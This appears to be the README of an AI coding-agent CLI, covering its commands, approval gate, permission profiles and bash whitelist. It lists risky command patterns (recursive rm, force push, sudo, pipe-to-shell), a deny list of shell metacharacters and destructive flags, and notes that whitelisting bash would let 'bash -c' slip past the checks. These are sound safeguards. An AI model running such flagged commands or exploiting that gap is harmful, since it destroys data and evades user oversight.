/undo - restore the most recent file change (the last write/edit/delete/move)
/map [path] - print a compact exported-symbol map of source files (default src)
/stats - per-session tool-usage table (calls, errors, total ms)
/recall <query> - search saved sessions (.my-ai/session-*.json) for text
/init - scan the repo and write a CLAUDE.md project-memory file
/review [staged] - have the model review the current git diff (add staged for the index)
/pr-comments [n] - list review comments on a PR via the gh CLI
/rewind [n] - drop the last n exchanges from the conversation (default 1)
/export - export the conversation to a markdown file under .my-ai/
/memory <fact> - append a fact to .my-ai/instructions.md and apply it this session
/context - estimated token-window usage by role (system / user / assistant / tool)
/save [id], /resume <id>, /sessions, /decompose <goal> - session + planning helpers
/exit - quit (also: /quit or Ctrl+C)

What you'll see — the chip surface

When the model calls tools, each parallel batch renders as a bracketed cluster of status "chips" on stderr (the visible answer stays clean on stdout):

⚡ 3 tools in parallel
  ○ read_file({"path":"src/a.ts"})
  ○ bash({"command":"ls"})
  ○ write_file({"path":"src/a.ts", ...})
  ● read_file  src/a.ts · 42 lines
  ● bash  $ ls · 7 lines
  ● write_file  src/a.ts · CREATE (+12 lines)
  ⚠ src/a.ts · colliding writes at indices 0,2
  ⚡ 3 tools · 1.2s

Pending pills (○, cyan) print once per tool before dispatch — one aggregate ⚡ N tool(s) in parallel header, then a pill per call (Tier 1.6).
Completed pills tint by outcome: ● green ok, ✖ red error (any Error… result or a non-Exit: 0 bash wrap — incl. timeouts/signal kills), ⊘ yellow blocked (a readonly-profile refusal). Each carries a one-line hint (<path> · CREATE (+N lines), ±N lines, $ <cmd> · N lines, …) (Tier 1.6).
Conflict chip (⚠, Tier 1.8): when two tracked writes (write_file / edit_file / delete_file) in the same batch target the same path, a ⚠ <path> · colliding writes at indices i,j row warns that they'd race; under the default profile this also escalates the batch to the plan gate (Path A) so you approve before they apply.
Batch timing (⚡ N tools · <time>, Tier 1.7): the closing bracket of every batch — wallclock for the concurrent dispatch, Nms under a second, N.Ns over.
Cost row (💸, Tier 1.9): a per-turn token estimate row (~<in> in / ~<out> out · <total> tok). Anthropic reports real usage; Ollama is a chars/4 estimate.

Under --verbose (or /verbose on) the cluster expands homogeneously (Tier 1.9): each pending pill gains a dim ↳ args: <full JSON> line, each completed pill a ↳ result preview, the timing line names the ↳ slowest: <tool>, and the cost row annotates ↳ estimate (chars/4) vs. ↳ model-reported.
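Two pieces of the chip surface are simple enough to sketch: the same-path collision check behind the ⚠ row and the elapsed-time format of the closing ⚡ line. `ToolCall`, `findCollisions`, and `formatElapsed` are hypothetical names, and rounding down to whole milliseconds is an assumption.

```typescript
interface ToolCall {
  name: string;
  path?: string;
}

// Only these tools count as tracked writes for collision purposes.
const TRACKED_WRITES = new Set(["write_file", "edit_file", "delete_file"]);

// Map each path to the batch indices of the tracked writes that target it,
// keeping only paths hit by two or more writes.
function findCollisions(calls: ToolCall[]): Map<string, number[]> {
  const byPath = new Map<string, number[]>();
  calls.forEach((call, index) => {
    if (!TRACKED_WRITES.has(call.name) || call.path === undefined) return;
    const indices = byPath.get(call.path) ?? [];
    indices.push(index);
    byPath.set(call.path, indices);
  });
  const collisions = new Map<string, number[]>();
  byPath.forEach((indices, path) => {
    if (indices.length >= 2) collisions.set(path, indices);
  });
  return collisions;
}

// "Nms" under a second, "N.Ns" at one second and over.
function formatElapsed(ms: number): string {
  return ms < 1000 ? `${Math.floor(ms)}ms` : `${(ms / 1000).toFixed(1)}s`;
}
```

Reporting indices rather than tool names lets the warning row point at the exact calls in the batch, even when both are the same tool.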

Free engine troubleshooting (`/doctor`)

Run /doctor anytime to check whether the free (Ollama) engine is set up correctly. It probes the configured provider, lists installed models, flags which ones can do tool calling, and tells you the next step.

✅ All green → "Free engine ready" — start typing.
⚠️ Ollama not reachable → install + start, with copy-pasteable setup steps.
⚠️ Model not installed → "set OLLAMA_MODEL= in .env" if a tool-capable one is already on disk, or ollama pull <model> if not.
For Anthropic, /doctor just verifies ANTHROPIC_API_KEY is set.

Troubleshooting

When a check fails, ask for the root cause and a one-line fix instead of a bare status:

/doctor --explain server     # is the Ollama daemon reachable? how to start it
/doctor --explain model      # is the configured model installed? pull recipe
/doctor --explain key        # is ANTHROPIC_API_KEY set? where to get one
/doctor --explain tools      # are tools registered?

Each prints cause: (what's actually wrong) and fix: (a copy-pasteable next step). model defers to server when the server is down, so you fix the upstream problem first.

| Symptom | Try |
|---|---|
| "Ollama not reachable" | /doctor --explain server → ollama serve, or fix OLLAMA_BASE_URL |
| Model answers but ignores tools | model isn't tool-capable; /doctor lists which installed models are; switch with /model or OLLAMA_MODEL |
| Last few characters of an answer look cut off | fixed in 0.4.x, so update; the streaming flush now drains trailing chars |
| Every command prompts even safe ones | you're on the paranoid profile; run /profile default |
| bash calls are refused | you're on the readonly profile; run /profile default |
| Approval prompt loops in a script | non-TTY can't approve; pass --no-approve or set MY_AI_AUTO_APPROVE=1 |

Approval gate

Destructive and shell-spawning tools (bash, delete_file, move_file, read_lints) show [y/N] before running, which is the safe default. Bypass it when you trust the session:

One-shot (per invocation): my-ai --no-approve
Persistent (set once in .env): MY_AI_AUTO_APPROVE=1 (also accepts true/yes/on)

When the gate is bypassed, every gated call runs without prompting and a ⚠ auto-approved (--no-approve) line is logged to stderr. Reads, writes, edits, glob, grep, web fetch, web search, and todo tracking are never gated.

The decision line under each prompt tells you exactly what will happen — e.g. $ rm -rf node_modules for bash, the file path for delete_file, or the file being linted for read_lints. When the command matches a risky pattern (recursive rm, --force / --force-with-lease, force push, raw dd writes, chmod/chown, sudo, pipe-to-shell, git reset --hard/rebase/filter-branch) a red danger badge is shown on the prompt so it can't be rubber-stamped.

Every gate decision — auto-approved, whitelisted, approved, rejected, blocked — is appended to .my-ai/audit.log (tab-separated: timestamp, decision, tool, danger tags, input preview). Logging is best-effort and never blocks the loop. .my-ai/ is gitignored.
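One way to picture an audit row is the formatter below. It is a sketch under assumptions: the ISO timestamp, comma-joined danger tags, and 120-character preview cap are guesses, and `auditLine` is a hypothetical name. Only the field order and the tab separator come from the description above.

```typescript
type GateDecision = "auto-approved" | "whitelisted" | "approved" | "rejected" | "blocked";

const PREVIEW_LIMIT = 120; // assumed cap, not documented

function auditLine(
  when: Date,
  decision: GateDecision,
  tool: string,
  dangerTags: string[],
  input: string,
): string {
  // Flatten tabs and line breaks so one decision always stays on one row
  // with exactly five tab-separated fields.
  const preview = input.replace(/[\t\r\n]+/g, " ").slice(0, PREVIEW_LIMIT);
  return [when.toISOString(), decision, tool, dangerTags.join(","), preview].join("\t");
}
```

A writer that appends this line inside a try/catch and ignores failures would match the best-effort behavior described above.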

Permission profiles

A coarse safety dial layered on top of the per-command whitelist. Switch at runtime with /profile <name>; the choice persists to .my-airc (gitignored). You can also set it per session with MY_AI_PROFILE, which takes precedence over the file.

| Profile | Per-tool gate | --no-approve / MY_AI_AUTO_APPROVE | Tier 1.4 plan gate (write-heavy batch) |
|---|---|---|---|
| default | Read-only bash auto-approved via whitelist; other gated tools prompt [y/N]. | Bypasses the [y/N] prompt (decision still audit-logged). | Fires on ≥2 file writes or ≥50 estimated new lines; a Tier 1.8 same-path collision also escalates an under-threshold batch to the plan card (Path A). Approving the plan suppresses the per-write diff prompts. |
| readonly | Refuses subprocess-spawning tools (bash, read_lints) outright. File read/write/edit still work. | N/A for shell tools (already blocked). | Skipped: writes are allowed, but nothing shells out. |
| paranoid | Every tool call (except ask_user) requires [y/N]. | Ignored: paranoid always prompts. | Layered: you see the plan card and each per-write diff prompt. |

Environment variables

| Var | Values | Effect |
|---|---|---|
| MY_AI_PROFILE | default / readonly / paranoid | Permission profile for the session; takes precedence over .my-airc. |
| MY_AI_AUTO_APPROVE | 1 / true / yes / on | Skip the [y/N] approval prompt (every decision is still audit-logged). Same effect as the --no-approve flag. |
| MY_AI_SAFE_COMMANDS | CSV / whitespace list of binary basenames | Extend the read-only bash whitelist without forking (e.g. pnpm,bun,deno,npx). Metachar + destructive-flag checks still apply. |
| MY_AI_COMPACTION_BUDGET | positive integer (default 8000) | Token budget before older turns are compacted. Negative / non-numeric throws fast on the first compaction call. |
| MY_AI_AUTO_SERIALIZE | 1 / true / yes / on | Tier 1.8 Path B (opt-in, off by default). On a same-path write_file / edit_file / delete_file collision in a batch under the default profile, src/plan.ts serializeCollisions reorders the colliding calls into a sequential slice so writes apply lowest-index→highest-index (the highest-index write wins, no Promise.all race), and src/chips.ts printAutoSerializeNote surfaces a neutral dim ↳ auto-serialized: <path> indices <i,j,k> row instead of the Tier 1.8 ⚠ warning. The Tier 1.4 plan-gate escalation (Path A) is also skipped. End-to-end exercised by Scenario E in tools/tier1.6-chip-smoke.ts. |
| MY_AI_PERSONA | path to a persona file | Voice / push-back / style-defaults caption, resolved at boot (file path only, not inline text). Falls back to .my-ai/persona.md, then the built-in default. |
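The boolean-style variables accept 1 / true / yes / on. A minimal sketch of that check follows; the flagEnabled name is hypothetical, and trimming plus case-insensitive matching are assumptions rather than documented behavior.

```typescript
const TRUTHY_VALUES = new Set(["1", "true", "yes", "on"]);

// raw: the variable's value, e.g. the contents of MY_AI_AUTO_APPROVE.
// Assumption: surrounding whitespace and letter case are ignored.
function flagEnabled(raw: string | undefined): boolean {
  return raw !== undefined && TRUTHY_VALUES.has(raw.trim().toLowerCase());
}
```

Anything else, including an unset variable, reads as off in this sketch.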

Reasoning models (`think` discipline)

Reasoning-capable Ollama models (deepseek-r1, qwen3 with reasoning mode, llama 3.x with extended thinking) and Anthropic Claude with extended thinking emit a private scratch section inline in their response - between <think>...</think> markers for Ollama, or as a separate thinking content block for Anthropic. The CLI captures that section as a dim "thinkpad" transcript on stderr (prefixed with a thinking emoji) so you can see what the model is reasoning about, and the final stored assistant message is stripped of those markers so the reasoning never becomes payload for the next turn. The visible answer on stdout stays clean.
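To illustrate the split between visible answer and reasoning, here is a non-streaming simplification. It assumes the markers are literal <think> and </think> tags and that the whole response is available as one string; src/think.ts is described as a state machine, so the real code presumably handles markers that arrive split across stream chunks. The splitThinking name is hypothetical.

```typescript
interface SplitResult {
  visible: string;     // what would be stored and printed on stdout
  reasoning: string[]; // what would go to the dim stderr thinkpad
}

// Removes every <think>...</think> span and collects the contents.
function splitThinking(raw: string): SplitResult {
  const reasoning: string[] = [];
  const visible = raw.replace(/<think>([\s\S]*?)<\/think>/g, (_match, inner: string) => {
    reasoning.push(inner.trim());
    return "";
  });
  return { visible: visible.trim(), reasoning };
}
```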

Whitelisted read-only bash commands

A small set of obviously-safe bash commands skip the prompt entirely, even when the gate is on. They are logged as ⚙ safe (whitelisted read-only: <command>).

Plain binaries (any args): ls, cat, head, tail, less, more, wc, file, stat, pwd, tree, du, basename, dirname, realpath, readlink, which, whereis, type, grep, rg, diff, sort, uniq, tr, cut, strings, ps, top, htop, pgrep, help, man, info, history, env, printenv, echo, date, whoami, hostname, uname, uptime, jq, xxd, hexdump, base32, base64
git read-only subcommands (2nd token): status, log, diff, show, branch, remote, rev-parse, tag, stash, ls-files, ls-tree, shortlog, describe, blame, reflog (note: config is not whitelisted — git config foo bar writes to .git/config, so it always prompts)
npm read-only subcommands (2nd token): test, ls, view, list, info, audit

Extending the whitelist (no fork needed)

You can extend the safe-command list without forking the project via the MY_AI_SAFE_COMMANDS env var. Comma- or whitespace-separated binary basenames are added to the read-only set; useful for opting pnpm, bun, deno, npx, etc., into the auto-approved pattern. Example in .env:

MY_AI_SAFE_COMMANDS=pnpm,bun,deno,npx

Safety checks (metachars, destructive flags) still run first and unconditionally, so this widens read-only recognition but never bypasses those checks. The leading-token match is basename-based, so /usr/local/bin/pnpm and pnpm both register as pnpm. To stay safe, do NOT add bash, sh, python, node, or any other subshell-capable binary: they'd auto-pass the leading-token check, and a bash -c … invocation wouldn't trip any metachar inside the -c argument.

The whitelist refuses any command with shell metacharacters (; & | < > $ ( ) { } ^ ` =) or destructive flags (-delete, -exec, --rm, --delete, --force, --write, --set-output). Anything that could chain (&&) or pipe (|) into another command always prompts. Commands not on the list also always prompt; better safe than quiet.
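Putting the whitelist rules together, the check order (metachars, then destructive flags, then the basename lookup) might look like the sketch below. It uses only a subset of the binaries and git subcommands listed above, the metacharacter set is one reading of the list in the text, and the function names are hypothetical rather than the exports of src/whitelist.ts.

```typescript
// Subsets of the documented lists, for illustration only.
const PLAIN_BINARIES = new Set(["ls", "cat", "head", "tail", "wc", "pwd", "grep", "rg", "echo"]);
const GIT_READONLY = new Set(["status", "log", "diff", "show", "branch", "blame"]);
const METACHARS = /[;&|<>$(){}^`=]/;
const DESTRUCTIVE_FLAGS = ["-delete", "-exec", "--rm", "--delete", "--force", "--write", "--set-output"];

// Splits MY_AI_SAFE_COMMANDS on commas and/or whitespace.
function parseSafeCommands(raw: string | undefined): string[] {
  return (raw ?? "").split(/[\s,]+/).filter((name) => name.length > 0);
}

function isWhitelisted(command: string, extra: string[] = []): boolean {
  // Safety checks run first and unconditionally.
  if (METACHARS.test(command)) return false;
  const tokens = command.trim().split(/\s+/);
  if (tokens.some((t) => DESTRUCTIVE_FLAGS.some((flag) => flag === t))) return false;
  // Basename match: /usr/local/bin/pnpm registers as pnpm.
  const bin = (tokens[0] ?? "").split("/").pop() ?? "";
  if (bin === "git") return GIT_READONLY.has(tokens[1] ?? "");
  return PLAIN_BINARIES.has(bin) || extra.some((name) => name === bin);
}
```

With this shape, git config foo bar fails the subcommand lookup and prompts, while a user-added pnpm passes only when no metacharacter or destructive flag is present.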

Compaction budget

When the running message list exceeds the compact-trigger threshold (in estimated tokens), the oldest turns are folded into a single summary and the tail is preserved verbatim (see src/compaction.ts). The threshold defaults to 8000 tokens (cheap chars/4 heuristic, no tokenizer dependency).

For long sessions and large contexts you may want to raise it. For shorter conversations or hardware-constrained runners you may want to lower it. Set in .env:

# Tunable; must be a non-negative integer. Leave unset to use 8000.
MY_AI_COMPACTION_BUDGET=8000

Bad input (negative, non-numeric) fails fast on the first compaction call with a clear message — easier to debug than a silent fallback. Calling code can also pass maxTokens explicitly to compactMessages(), which always wins over the env var.
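The budget resolution and the chars/4 estimate can be sketched as below. The function names other than the documented maxTokens parameter are hypothetical, treating an empty string as unset is an assumption, and the sketch accepts zero because the text is not explicit about it.

```typescript
const DEFAULT_BUDGET = 8000;

// Cheap heuristic from the README: roughly four characters per token.
function estimateTokens(text: string): number {
  return Math.ceil(text.length / 4);
}

// envValue: contents of MY_AI_COMPACTION_BUDGET.
// An explicit maxTokens always wins over the env var.
function resolveBudget(envValue: string | undefined, maxTokens?: number): number {
  if (maxTokens !== undefined) return maxTokens;
  if (envValue === undefined || envValue.trim() === "") return DEFAULT_BUDGET;
  const parsed = Number(envValue);
  if (!Number.isInteger(parsed) || parsed < 0) {
    // Fail fast instead of silently falling back to the default.
    throw new Error(`MY_AI_COMPACTION_BUDGET must be a non-negative integer, got "${envValue}"`);
  }
  return parsed;
}

// True when the estimated total exceeds the budget.
function shouldCompact(messages: string[], budget: number): boolean {
  const total = messages.reduce((sum, m) => sum + estimateTokens(m), 0);
  return total > budget;
}
```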

Try it

you › create a hello.py file that prints "hello from my-ai" and runs it

You should see the model planning (TodoWrite), then creating the file, then running it via bash.

Worked examples

Longer, real workflows live in examples/:

examples/refactor.md — a multi-file rename with the test suite pinned as a safety net.
examples/whitelist-extension.md — opt pnpm / bun / deno into the read-only whitelist via MY_AI_SAFE_COMMANDS.
examples/think-discipline.md — what the dim stderr thinkpad looks like next to the clean stdout answer.
examples/v0.7.4-buffy-prompts.md — the v0.7.4 release-flow split: 5 Bufy-side (B1–B5) prompts paired with Claude's C1–C5. B1–B3 are the smoke × 3 + README-parity + Scenario E additions; B4–B5 are the npm publish + git push/gh release ops.

Parallel-tool chip layer (Tier 1.6 – 1.9)

When the model emits a parallel batch of tool calls, every batch reads as a bookended cluster on stderr:

Tier 1.6 pending → completed pills. A dim ⚡ N tool(s) in parallel header followed by cyan ○ pending pills (one per call), then a tinted completed pill below each: green ● ok, red ✖ err, yellow ⊘ blocked. The hint next to each completed pill summarizes the effect — path · CREATE (+N lines) for write_file, ±N lines for edit_file, $ cmd · N lines for bash, path · deleted, path · N issues for read_lints, etc. Pure presentation in src/chips.ts, ~180 lines.
Tier 1.7 cumulative batch timing. A second dim ⚡ N tool(s) · <time> line closes every batch — wallclock of the parallel dispatch, e.g. ⚡ 3 tools · 234ms. Anchors the perf signal to the chips it timed.
Tier 1.8 parallel-conflict detection. When two PLAN_TRACKED_TOOLS calls (currently write_file / edit_file / delete_file) in the same parallel batch target the same path, the last write silently wins under Promise.all. A neutral dim ⚠ <path> · colliding writes at indices <i,j,k> row renders AFTER the completed chips but BEFORE the timing summary, one per detected collision. The default profile also escalates these batches to the Tier 1.4 plan gate (the user reviews the colliding writes BEFORE they race) via the threshold.trigger: "conflict" path in src/cli.ts agentTurn. Path A (escalate-to-prompt) is the current default; Path B (auto-serialize) is opt-in via MY_AI_AUTO_SERIALIZE=1.
Tier 1.9 verbose-mode homogeneity. Under --verbose (or /verbose on), every chip class threads the flag: completed pills get a dim ↳ <result preview> line; pending pills get a dim ↳ args: <full JSON> line; the cumulative batch timing gets · slowest: <name> <ms|secs>; the conflict chip gets (name1, name2) so you can see WHICH tools raced. Non-verbose callers get the byte-identical Tier 1.6 output.
Tier 1.9 per-turn cost chip. The Anthropic SDK reports exact input_tokens / output_tokens (↳ model-reported under verbose). The OpenAI-compatible Ollama endpoint doesn't surface usage, so output_tokens is approximated via the same Math.ceil(visibleContent.length / 4) heuristic the compactor uses (↳ estimate (chars/4) under verbose). The chip renders as a single dim 💸 ~<in> in / ~<out> out · <total> tok row between the conflict chips and the timing summary.

The full chip surface is pinned in tests/chips.test.ts (55 fixtures) and end-to-end exercised by tools/tier1.6-chip-smoke.ts (5 scenarios: A defaults, B verbose, C readonly, D parallel-conflict, E auto-serialize). Every claim above has a fixture or smoke scenario.
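The Tier 1.8 same-path detection boils down to grouping tracked calls by path and keeping the groups with more than one index. The sketch below assumes a simplified call shape (name plus optional path) and does no path normalization; BatchCall, findCollisions, and formatConflictRow are hypothetical names.

```typescript
// Hypothetical, simplified call shape for illustration.
interface BatchCall {
  name: string;
  path?: string;
}

const PLAN_TRACKED_TOOLS = new Set(["write_file", "edit_file", "delete_file"]);

// Maps each path touched by 2+ tracked calls to the batch indices involved.
function findCollisions(batch: BatchCall[]): Map<string, number[]> {
  const byPath = new Map<string, number[]>();
  batch.forEach((call, index) => {
    if (!PLAN_TRACKED_TOOLS.has(call.name) || call.path === undefined) return;
    const indices = byPath.get(call.path) ?? [];
    indices.push(index);
    byPath.set(call.path, indices);
  });
  const collisions = new Map<string, number[]>();
  byPath.forEach((indices, path) => {
    if (indices.length > 1) collisions.set(path, indices);
  });
  return collisions;
}

// Renders the row format described for the conflict chip.
function formatConflictRow(path: string, indices: number[]): string {
  return `⚠ ${path} · colliding writes at indices ${indices.join(",")}`;
}
```

Reads of the same path are ignored because only the tracked write-type tools can race on content.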

Tool inventory

| Tool | What it does |
|---|---|
| read_file | Reads file contents. Supports offset/limit for large files. |
| write_file | Creates or overwrites a file (creates parent dirs). |
| edit_file | Targeted string replacement. Errors if old_string isn't unique. |
| bash | Runs shell commands with 5-minute timeout. Reserved for things that need a shell. |
| list_dir | Lists immediate contents of a directory. |
| Glob | Finds files by glob pattern (e.g. **/*.ts). |
| Grep | Searches file contents with regex. Ripgrep when available, falls back to a pure-Node walker. |
| WebFetch | Fetches a URL and returns readable text (strips HTML). |
| TodoWrite | Tracks a task list in conversation. The model uses this to plan its work. |
| ask_user | Pauses the loop and asks the human a structured question (single or multi select, with optional free-form fallback). Use when a decision, blocker, or missing credential should not be auto-resolved. Replaces ad-hoc prose questions with clean schema answers. |
| tree | Compact read-only directory tree. Wraps src/explore.ts#fsTree. Skips node_modules, .git, and dotfiles by default; capped at depth 3 + 200 entries. The same helper powers the /tree slash command, so a delegated explorer / reviewer sub-agent can map a project without a flood of list_dir calls. |

Project structure

src/
├── cli.ts              # Main chat loop, message history, slash commands, approval gate
├── client.ts           # Provider dispatcher (reads PROVIDER env); runtime provider switch
├── doctor.ts           # /doctor + /doctor --explain (free-engine diagnostics)
├── prompts.ts          # System prompt (independently written; Claude Code-style behavior)
├── server.ts           # `my-ai serve` HTTP + SSE + /api/upload layer (BW-A1)
├── agent-engine.ts     # chat → tool dispatch loop shared with REPL's agentTurn (BW-A1)
├── tools.ts            # Tool definitions + execute() handlers
├── whitelist.ts        # Bash read-only whitelist + MY_AI_SAFE_COMMANDS merge (testable)
├── danger.ts           # Danger tagging for the approval prompt
├── audit.ts            # Append-only approval audit log (.my-ai/audit.log)
├── profiles.ts         # Permission profiles (default/readonly/paranoid)
├── compaction.ts       # Long-context compaction (fold oldest turns into a summary)
├── tokens.ts           # /tokens report (per-role + total + budget + utilization; reuse compaction's heuristic)
├── think.ts            # think-discipline state machine (visible vs. reasoning)
├── multimodal.ts        # File → ContentPart[] (image_url, text block, pdf extract, routed note) (BW-A2)
├── mentions-resolve.ts  # REPL @mention + serve uploaded-file → resolver, vision-gate aware (BW-A2)
├── image-meta.ts        # Pure image-header decoder (PNG/JPEG/GIF/WebP/BMP → {width,height,mime}) (BW-A2)
├── lang-detect.ts       # Per-message lang/code heuristic for the chat wire (BW-A2)
└── providers/
    ├── types.ts        # Provider interface, normalized Message types
    ├── capabilities.ts # providerSupportsImages(name, model) regex gate (BW-A2)
    ├── anthropic.ts    # Anthropic Claude SDK adapter
    ├── ollama.ts       # OpenAI-compatible adapter (Ollama, LM Studio, vLLM)
    └── mock.ts         # Offline scripted provider (test/smoke only, gated behind MY_AI_MOCK)
ui/
└── index.html         # `my-ai serve` chat UI shell — single-file HTML + inline JS (BW-A1)

How the tool loop works

1. You type a message.
2. The CLI sends it to the configured provider along with conversation history + available tools.
3. The model responds. It may:
   - Return text only: we print it and end the turn.
   - Call one or more tools: we run them in parallel, feed the results back as tool messages, and the model gets another turn.
4. The loop continues until the model's response has no tool_calls (i.e. it's done).

This is the same agentic tool-loop pattern Claude Code uses, reimplemented here from its publicly documented behavior.
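As a rough illustration of that loop, the sketch below runs one user turn against an injected provider function. The Message, Provider, and ToolHandler shapes are simplified assumptions and not the interfaces in src/providers/types.ts or src/tools.ts, and the maxSteps guard is an addition for safety in the example rather than documented behavior.

```typescript
interface ToolCall { name: string; args: Record<string, unknown>; }
interface Message {
  role: "user" | "assistant" | "tool";
  content: string;
  toolCalls?: ToolCall[];
}
// Hypothetical minimal shapes, for illustration only.
type Provider = (history: Message[]) => Promise<Message>;
type ToolHandler = (args: Record<string, unknown>) => Promise<string>;

async function runTurn(
  userText: string,
  history: Message[],
  provider: Provider,
  tools: Map<string, ToolHandler>,
  maxSteps = 20, // assumption: guard against a model that never stops calling tools
): Promise<string> {
  history.push({ role: "user", content: userText });
  for (let step = 0; step < maxSteps; step++) {
    const reply = await provider(history);
    history.push(reply);
    const calls = reply.toolCalls ?? [];
    // Text-only response: the turn is over.
    if (calls.length === 0) return reply.content;
    // Run the whole batch in parallel; errors become tool output, not crashes.
    const results = await Promise.all(calls.map(async (call) => {
      const handler = tools.get(call.name);
      if (handler === undefined) return `error: unknown tool ${call.name}`;
      try {
        return await handler(call.args);
      } catch (err) {
        return `error: ${String(err)}`;
      }
    }));
    // Feed results back as tool messages so the model gets another turn.
    for (const result of results) history.push({ role: "tool", content: result });
  }
  throw new Error("tool loop exceeded maxSteps");
}
```

Passing the provider and tool map in as arguments keeps the loop testable with a scripted provider, similar in spirit to the mock provider listed under src/providers/.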

Customizing

Change the model: edit OLLAMA_MODEL (or ANTHROPIC_MODEL) in .env.
Change the personality: edit src/prompts.ts.
Add a tool: define a ToolHandler in src/tools.ts and add it to the tools array.
Add a new provider: implement the Provider interface in a new file under src/providers/, then wire it up in src/client.ts.

Limitations

This is an MVP focused on being easy to read and run.

Approval prompts gate destructive / shell-spawning tools (bash, delete_file, read_lints) by default — bypass with --no-approve or MY_AI_AUTO_APPROVE=1 (see above).
No conversation persistence — /exit clears history. Restart loses context.
No sub-agent spawning — unlike Codebuff or Claude Code's Task tool, there's just one model.
No file_path:line_number rendering in the CLI (the model produces them, but the terminal won't hyperlink).
Local model quality is hardware-dependent — a 3b model will make mistakes a 32b won't. Pick a size that matches your GPU.

Contributing

CHANGELOG convention — every commit that ships a user-facing feature, behavior change, deprecation, or safety fix updates [CHANGELOG.md](./CHANGELOG.md)'s [Unreleased] section in the same commit (same-commit-per-feature rule). Doc-only, test-only, refactor-only, and chore commits are exempt — they don't ship anything a user would notice. See the top of CHANGELOG.md for the full rationale.
Tests pin behavior — any new code under src/ must also land a pinned test in tests/ (the established pattern is src/whitelist.ts + tests/whitelist.test.ts, a SAFE/UNSAFE battery that locks the safety boundary). Run npm test before committing. Regressions in the safety boundary are a real risk if tests are skipped.
Typecheck before commit — npm run typecheck must pass. CI (.github/workflows/ci.yml) runs typecheck + test + smoke on Node 20 and 22; the .githooks/pre-push hook runs the same gate locally (enable with git config core.hooksPath .githooks).
Commit message style — Conventional Commits prefix. Established prefixes in this repo: feat: (new feature), feat(scope): (scoped feature — e.g. feat(doctor)), fix: (bug fix), fix(scope): (scoped fix), chore(release): (release cut), docs: (doc-only commit that doesn't ship a behavior change). Use the scope tag to tie the commit to its component.
Releasing — when shipping a version, the cut is mechanical:
1. Open CHANGELOG.md and rename ## [Unreleased] to ## [X.Y.Z] - YYYY-MM-DD so its contents become the new dated block, then add a fresh, empty ## [Unreleased] heading above it for the next cycle.
2. Bump version in package.json to match.
3. Commit with chore(release): cut vX.Y.Z — <one-line summary> (use scoped env-var identity so global git config isn't touched; see chore(release): cut v0.4.0 for the established form).
4. Tag locally: git tag -a vX.Y.Z -m "vX.Y.Z — <summary>".
5. Extract the new section to release notes: bash tools/cut-release-section.sh vX.Y.Z > /tmp/vX.Y.Z-notes.md. The helper uses substring match so dotted version forms don't get tripped up by awk regex metachars.
6. Push: git push origin main (the release commit) and git push origin vX.Y.Z (the tag).
7. Publish: gh release create vX.Y.Z --title "vX.Y.Z — <summary>" --notes-file /tmp/vX.Y.Z-notes.md.
8. Rebuild the source tarball: git archive --format=tar.gz -o my-ai-vX.Y.Z.tar.gz vX.Y.Z (always from the local tag, never HEAD — keeps the tarball pinned to the released state).
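The substring-match idea behind step 5 can be illustrated in TypeScript. This is an analogue for explanation only, not a port of tools/cut-release-section.sh: the extractSection name is hypothetical, and stripping a leading v before matching the ## [X.Y.Z] header is an assumption about how the tag maps to the changelog heading.

```typescript
// Returns the changelog block for one version, header included.
function extractSection(changelog: string, version: string): string {
  const bare = version.replace(/^v/, "");
  // Literal prefix match: the dots in "0.4.0" are never treated as regex wildcards.
  const header = `## [${bare}]`;
  const lines = changelog.split("\n");
  const start = lines.findIndex((line) => line.startsWith(header));
  if (start === -1) throw new Error(`no CHANGELOG section for ${version}`);
  // The section ends at the next version header, or at end of file.
  const next = lines.slice(start + 1).findIndex((line) => line.startsWith("## ["));
  const end = next === -1 ? lines.length : start + 1 + next;
  return lines.slice(start, end).join("\n").trim();
}
```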

Hardware sanity check

| Ollama model size | RAM | Recommended hardware |
|---|---|---|
| 3B params | 4 GB | Any modern laptop, CPU OK (slow) |
| 7B params | 8 GB | 8 GB+ NVIDIA GPU recommended |
| 13B params | 12 GB | 12 GB+ NVIDIA GPU |
| 32B params | 20 GB | 24 GB GPU (e.g. RTX 3090/4090) |
| 70B+ params | 40+ GB | Multi-GPU / server-grade |

If you have no GPU, stick to 3B and accept ~2–5 tokens/sec. With even a 6 GB GPU, 7B feels fast.

License

MIT